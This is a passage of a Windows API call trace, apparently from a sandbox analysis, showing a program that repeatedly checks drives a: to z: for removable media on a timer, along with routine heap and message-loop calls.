lpsz="removable") returned 0x9 [0215.138] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.138] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.138] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.139] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.139] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.139] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.139] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.139] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.139] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.139] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.140] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.140] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.140] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.140] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.140] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.140] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.140] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.141] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.141] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.141] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.141] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.141] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.142] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.142] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.142] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.142] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0215.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0215.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.143] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fe0 [0215.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fe0 | out: hHeap=0x12c0000) returned 1 [0215.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0215.143] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0215.143] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.144] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.144] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.144] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.144] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.144] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.144] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.144] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.145] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.145] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0215.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0215.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.145] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0215.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.145] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.145] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.145] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.145] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.146] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.146] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.146] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.146] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.146] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.146] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.146] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.147] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.147] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.147] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.147] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.147] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.147] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.147] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.148] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.148] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.148] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.148] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.148] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.148] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.149] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.149] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.149] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0215.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0215.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.150] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0215.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0215.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0215.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0215.150] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0215.150] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.151] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.151] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.151] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.151] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.152] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0215.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.152] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.152] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.152] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.152] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.152] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.152] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.153] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.153] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.153] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.153] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.153] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.154] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.154] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.154] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.154] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.154] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.155] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.155] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.155] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.155] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.155] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.155] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.155] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.156] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.156] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.156] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.156] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.156] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.156] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.156] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.156] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.156] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.157] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.157] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.157] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.157] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.157] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.157] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.157] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.157] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0215.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.157] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.157] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.157] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0215.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.158] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0215.158] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0215.158] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.158] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.158] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.158] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.158] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.158] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.158] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0215.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.159] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.159] 